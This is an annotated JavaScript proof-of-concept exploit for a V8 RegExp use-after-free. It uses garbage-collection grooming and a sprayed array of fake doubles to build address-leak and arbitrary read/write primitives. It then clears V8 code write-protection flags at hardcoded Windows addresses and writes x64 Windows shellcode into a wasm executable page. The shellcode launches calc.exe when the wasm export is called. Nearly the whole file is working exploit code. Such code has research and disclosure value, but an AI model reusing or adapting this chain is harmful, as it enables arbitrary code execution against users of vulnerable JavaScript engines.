/**
 * Scratch helpers for reinterpreting 64-bit values between their
 * floating-point and integer encodings, plus two allocation-based GC
 * triggers and a root set that keeps objects alive.
 *
 * Every conversion goes through the same 8-byte buffer, so each call
 * clobbers the result of the previous one: read what you need before
 * calling the next helper.
 */
class Helpers {
  constructor() {
    // One 8-byte scratch buffer and every typed view the helpers use over it.
    this.buf = new ArrayBuffer(8);
    this.dv = new DataView(this.buf);
    this.u8 = new Uint8Array(this.buf);
    this.u32 = new Uint32Array(this.buf);
    this.u64 = new BigUint64Array(this.buf);
    this.f32 = new Float32Array(this.buf);
    this.f64 = new Float64Array(this.buf);
    // Objects parked here stay reachable for as long as the helper does.
    this.roots = new Array(0x30000);
    this.index = 0;
  }

  /** Double whose low 32 bits are `p1` and high 32 bits are `p2`. */
  pair_i32_to_f64(p1, p2) {
    this.set_l(p1);
    this.set_h(p2);
    return this.f64[0];
  }

  /** Reinterpret the 64-bit BigInt `i` as a double (throws TypeError on a Number). */
  i64tof64(i) {
    this.set_i64(i);
    return this.f64[0];
  }

  /** Reinterpret the double `f` as an unsigned 64-bit BigInt. */
  f64toi64(f) {
    this.f64[0] = f;
    return this.get_i64();
  }

  /** Load the scratch buffer with a 64-bit BigInt. */
  set_i64(i) {
    this.u64[0] = i;
  }

  /** Overwrite the low dword of the scratch buffer. */
  set_l(i) {
    this.u32[0] = i;
  }

  /** Overwrite the high dword of the scratch buffer. */
  set_h(i) {
    this.u32[1] = i;
  }

  /** Read the scratch buffer back as an unsigned 64-bit BigInt. */
  get_i64() {
    return this.u64[0];
  }

  /** Low dword of the double `f`. */
  ftoil(f) {
    this.f64[0] = f;
    return this.u32[0];
  }

  /** High dword of the double `f`. */
  ftoih(f) {
    this.f64[0] = f;
    return this.u32[1];
  }

  /** Park `object` in the next free root slot so the GC cannot reclaim it. */
  add_ref(object) {
    const slot = this.index;
    this.index = slot + 1;
    this.roots[slot] = object;
  }

  /**
   * Request a ~2 GiB ArrayBuffer and drop it immediately; the allocation
   * pressure is what is meant to provoke a full (mark-sweep) collection.
   */
  mark_sweep_gc() {
    new ArrayBuffer(0x7fe00000);
  }

  /**
   * Fill the new-space external backing-store budget with eight 2 MiB
   * buffers, then make one tiny allocation to tip it into a scavenge.
   * All nine buffers are kept alive via the root set.
   */
  scavenge_gc() {
    let remaining = 8;
    while (remaining > 0) {
      this.add_ref(new ArrayBuffer(0x200000));
      remaining -= 1;
    }
    this.add_ref(new ArrayBuffer(8));
  }

  /** Zero-padded, 16-digit lowercase hex rendering of a Number or BigInt. */
  hex(i) {
    const digits = i.toString(16);
    return digits.padStart(16, "0");
  }

  /**
   * Does nothing useful at runtime (the slice result is discarded);
   * presumably a convenient place to set a native breakpoint while debugging.
   */
  breakpoint() {
    this.buf.slice();
  }
}
// ---------------------------------------------------------------------------
// Trigger for the V8 RegExp use-after-free this file is named after.
// NOTE(review): from here to the final f() call the script depends on exact
// allocation order and GC timing in the V8 build it was written against
// (see the "Adapt this with your own value" comment further down). Do not
// reorder statements or introduce extra allocations between them.
// ---------------------------------------------------------------------------
var helper = new Helpers();
var corrupted_array; // assigned from re.lastIndex after the GCs and then indexed like a JSArray
var fake_object_array; // packed-double array whose raw 64-bit bit patterns are read as an object
var re = new RegExp('foo', 'g');
var match_object = {};
// Returned by the hooked exec as its "match"; element 0 stringifies to "",
// which is what replace() takes as the matched text.
match_object[0] = {
toString: function () {
return "";
}
};
// Own-property exec hook, invoked from inside re[Symbol.replace] below.
re.exec = function () {
helper.mark_sweep_gc();
delete re.exec; // transition back to initial regexp map
re.lastIndex = 1073741823; // maximum smi, adding one will result in a HeapNumber
new Array(256); // add space before NewHeapNumber<newSpace>
// Any further exec call throws, so replace() unwinds right after it has
// boxed lastIndex + 1 into a fresh HeapNumber.
RegExp.prototype.exec = function () {
throw ''; // break out of Regexp.replace
}
return match_object;
};
// The throw is expected and deliberately swallowed; newstr is never used.
try {
var newstr = re[Symbol.replace]("fooooo", ".$");
} catch (e) { }
// Young-generation then full collection (per the helper names), intended to
// reclaim the HeapNumber created during replace() before anything else is
// allocated.
helper.scavenge_gc();
helper.mark_sweep_gc();
// The large array literal that follows alternates two doubles chosen for
// their raw 64-bit bit patterns (the commented-out pair_i32_to_f64 prints
// after it show how such values are derived). Presumably it is allocated
// over the reclaimed HeapNumber so that re.lastIndex now points into it --
// TODO confirm against the target build; the constants are build-specific.
fake_object_array = [1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 
1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 
8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 
1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 
8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 
1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 
8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309];
// Allocated right after fake_object_array; addrof() below stores into it and
// reads the slot back through corrupted_array.
var addrof_array = new Array(32);
// The stale lastIndex reference: the HeapNumber it pointed to was reclaimed
// by the GCs above, so whatever now occupies that memory is treated as an
// array from here on (every corrupted_array[i] reads through it).
corrupted_array = re.lastIndex;
// Adapt this with your own value to create a fake array object
// print(helper.pair_i32_to_f64(0x00203b19, 0x2269));
// print(helper.pair_i32_to_f64(0x0343151, 0x60000));
// Debug aid only (see the commented-out print below); not used by the exploit.
var parent_array_addr = helper.ftoil(corrupted_array[0]);
// print(helper.hex(parent_array_addr));
// Leak the (compressed) address of `obj` as a double: park it in
// addrof_array[0] and read it back through corrupted_array. Index 5 is
// layout-specific -- presumably addrof_array's first element as seen through
// the corrupted elements pointer (TODO confirm against the target build).
// Callers pass the result through helper.ftoil() to get the low dword.
function addrof(obj) {
addrof_array[0] = obj;
return corrupted_array[5];
}
// Read 8 bytes at the 32-bit address `where` and return them as a double.
// Slot 131 of fake_object_array appears to overlay the corrupted array's
// (elements, length) pair: the low dword becomes the elements pointer
// (where - 8, so element 0 lands on `where` after the 8-byte elements
// header) and the high dword 0x20 a Smi length.
// NOTE(review): inferred from usage; confirm against the target build.
function arbRead(where) {
fake_object_array[131] = helper.pair_i32_to_f64(where - 8, 0x20);
return corrupted_array[0];
}
// Write the 64-bit BigInt `what` to the 32-bit address `where`, using the
// same slot-131 redirection as arbRead(). `what` must be a BigInt: it is
// converted with helper.i64tof64(), whose BigUint64Array store throws a
// TypeError for a plain Number.
function arbWrite(where, what) {
fake_object_array[131] = helper.pair_i32_to_f64(where - 8, 0x20);
corrupted_array[0] = helper.i64tof64(what);
}
// ---------------------------------------------------------------------------
// Turn the read/write primitives into a byte-granular write: `mem` is an
// ArrayBuffer whose backing-store pointer (presumably the field at +0x1c,
// given how it is used below -- TODO confirm) gets redirected, after which
// dv.setUint8(0, ...) writes to whatever address was installed.
// ---------------------------------------------------------------------------
let mem = new ArrayBuffer(1024);
let dv = new DataView(mem);
let mem_addr = helper.ftoil(addrof(mem));
print("[+] mem addr:", helper.hex(mem_addr))
// remove wasm write protection, use your own offset
// NOTE(review): absolute virtual addresses of three V8 flag globals in one
// specific build: `base` is the high dword, each FLAG_* entry the low dword.
// Nothing leaked above feeds into them, so the PoC only works on a build
// with exactly this layout and must be re-derived for any other target
// (0x7ff6xxxx_xxxxxxxx looks like a Windows x64 image address, consistent
// with the Windows payload at the end of the file).
let TARGET = {
'base': 0x7ff6,
'FLAG_write_protect_code_memory': 0xcde20b10,
'FLAG_wasm_memory_protection_keys': 0xcde20aa5,
'FLAG_wasm_write_protect_code_memory': 0xcde20aa4
}
// For each flag: point mem's backing store at the flag's address, then write
// a single 0 byte through the DataView to clear it. setUint8's third
// argument is ignored (only the multi-byte setters take a littleEndian flag).
arbWrite(mem_addr + 0x1c, helper.f64toi64(helper.pair_i32_to_f64(TARGET['FLAG_write_protect_code_memory'], TARGET['base'])));
dv.setUint8(0, 0, true);
arbWrite(mem_addr + 0x1c, helper.f64toi64(helper.pair_i32_to_f64(TARGET['FLAG_wasm_memory_protection_keys'], TARGET['base'])));
dv.setUint8(0, 0, true);
arbWrite(mem_addr + 0x1c, helper.f64toi64(helper.pair_i32_to_f64(TARGET['FLAG_wasm_write_protect_code_memory'], TARGET['base'])));
dv.setUint8(0, 0, true);
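// Minimal wasm module (decoded from the bytes): one function type () -> i32,
// one function, an empty funcref table, one memory page, exports "memory"
// and "main"; main's body is `i32.const 42; end`. Its only purpose is to get
// an executable wasm code region allocated for the instance.
var wasmCode = new Uint8Array([0, 97, 115, 109, 1, 0, 0, 0, 1, 133, 128, 128, 128, 0, 1, 96, 0, 1, 127, 3, 130, 128, 128, 128, 0, 1, 0, 4, 132, 128, 128, 128, 0, 1, 112, 0, 0, 5, 131, 128, 128, 128, 0, 1, 0, 1, 6, 129, 128, 128, 128, 0, 0, 7, 145, 128, 128, 128, 0, 2, 6, 109, 101, 109, 111, 114, 121, 2, 0, 4, 109, 97, 105, 110, 0, 0, 10, 138, 128, 128, 128, 0, 1, 132, 128, 128, 128, 0, 0, 65, 42, 11]);
var wasmModule = new WebAssembly.Module(wasmCode);
var wasmInstance = new WebAssembly.Instance(wasmModule, {});
var f = wasmInstance.exports.main;
// Restore slot 131 to the value from the commented-out print in the
// "Adapt this" block above, presumably so corrupted_array looks like a
// sane array again and addrof() can be reused -- TODO confirm.
fake_object_array[131] = helper.pair_i32_to_f64(0x0343151, 0x60000);
let wasmInstance_addr = helper.ftoil(addrof(wasmInstance));
// Label fixed: this prints the WebAssembly.Instance address, not mem's
// (the original message repeated "[+] mem addr:").
print("[+] wasmInstance addr:", helper.hex(wasmInstance_addr));
// +0x60 into the instance is presumed to hold a pointer into its executable
// code region (build-specific; adjust together with TARGET above).
let rwx_page = helper.f64toi64(arbRead(wasmInstance_addr + 0x60));
print("[+] rwx_page addr:", helper.hex(rwx_page));
// Point mem's backing store at that code region; the shellcode array that
// follows is then copied in byte by byte through dv.
arbWrite(mem_addr + 0x1c, rwx_page);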
// x64 Windows payload (decoded from the bytes): walks PEB -> Ldr ->
// InMemoryOrderModuleList to a loaded module (typically kernel32), resolves
// "WinExec" by name from its export table, and calls WinExec("calc.exe", 1).
// Both strings are stored bitwise-NOT'd inside `mov rax, imm64` and restored
// with `not rax`, so they do not appear as plain text in the byte array.
let shellcode = [72, 49, 255, 72, 247, 231, 101, 72, 139, 88, 96, 72, 139, 91, 24, 72, 139, 91, 32, 72, 139, 27, 72, 139, 27, 72, 139, 91, 32, 73, 137, 216, 139, 91, 60, 76, 1, 195, 72, 49, 201, 102, 129, 193, 255, 136, 72, 193, 233, 8, 139, 20, 11, 76, 1, 194, 77, 49, 210, 68, 139, 82, 28, 77, 1, 194, 77, 49, 219, 68, 139, 90, 32, 77, 1, 195, 77, 49, 228, 68, 139, 98, 36, 77, 1, 196, 235, 50, 91, 89, 72, 49, 192, 72, 137, 226, 81, 72, 139, 12, 36, 72, 49, 255, 65, 139, 60, 131, 76, 1, 199, 72, 137, 214, 243, 166, 116, 5, 72, 255, 192, 235, 230, 89, 102, 65, 139, 4, 68, 65, 139, 4, 130, 76, 1, 192, 83, 195, 72, 49, 201, 128, 193, 7, 72, 184, 15, 168, 150, 145, 186, 135, 154, 156, 72, 247, 208, 72, 193, 232, 8, 80, 81, 232, 176, 255, 255, 255, 73, 137, 198, 72, 49, 201, 72, 247, 225, 80, 72, 184, 156, 158, 147, 156, 209, 154, 135, 154, 72, 247, 208, 80, 72, 137, 225, 72, 255, 194, 72, 131, 236, 32, 65, 255, 214, 195];
// Copy the payload into the code region through the redirected DataView.
// The third argument to setUint8 is ignored (no endianness for one byte).
for (var i = 0; i < shellcode.length; i++) {
dv.setUint8(i, shellcode[i], true);
}
// Drop the references to the corrupted and fake objects before transferring
// control, presumably so a GC triggered afterwards does not walk them.
corrupted_array = null;
re.lastIndex = {};
// Calling the wasm export now runs the bytes written above.
f();